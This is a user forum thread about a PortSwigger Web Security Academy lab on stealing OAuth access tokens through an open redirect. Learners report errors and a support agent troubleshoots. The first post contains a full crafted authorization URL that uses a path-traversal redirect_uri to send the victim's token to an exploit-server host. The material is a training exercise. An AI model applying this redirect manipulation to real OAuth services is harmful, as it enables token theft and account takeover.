Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Stealing OAuth access tokens via an open redirect

TIZEE | Last updated: Jan 21, 2023 02:03PM UTC

https://0a5900c503a255e2c0a2ed1f02a7003c.web-security-academy.net/auth?client_id=bafv9dae8qp24om34rrbm&redirect_uri=https://0a0000a2035e554ec06eef8d00b00056.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ad500a503b35524c06deebc01e700fb.exploit-server.net/exploit&response_type=token&nonce=399721827&scope=openid%20profile%20email This lab shows client error:forbidden,is something wrong in this lab? I ve been trying for 6 hrs and still it shows like this.

Michelle, PortSwigger Agent | Last updated: Jan 23, 2023 03:27PM UTC

I've just been testing this out, and I've not come across the same issue yet. If this is still happening, can you tell us more about the steps you're taking?

newbie | Last updated: Sep 25, 2023 07:02AM UTC

I'm having 2 issues when trying to solve this lab. 1. I am not able to complete the full authentication flow of the lab because of the default CORS policy. "Access to fetch at 'https://[OAUTH-SERVER-ID]/me' from origin 'https://[LAB-SERVER-ID]' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: The 'Access-Control-Allow-Origin' header has a value 'https://fcbz.com' that is not equal to the supplied origin." This is on Chromium Version 117.0.5938.62 (Official Build) (arm64) and Firefox 117.0.1 . 2. Exploit server urls are never visited by an IP other than my own when delivering to victim, no matter what url or headers i provide.

Michelle, PortSwigger Agent | Last updated: Sep 25, 2023 10:04AM UTC

Hi Do you have any extensions enabled? Maybe Param Miner? If so, if you disable it, do you see the same issues?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.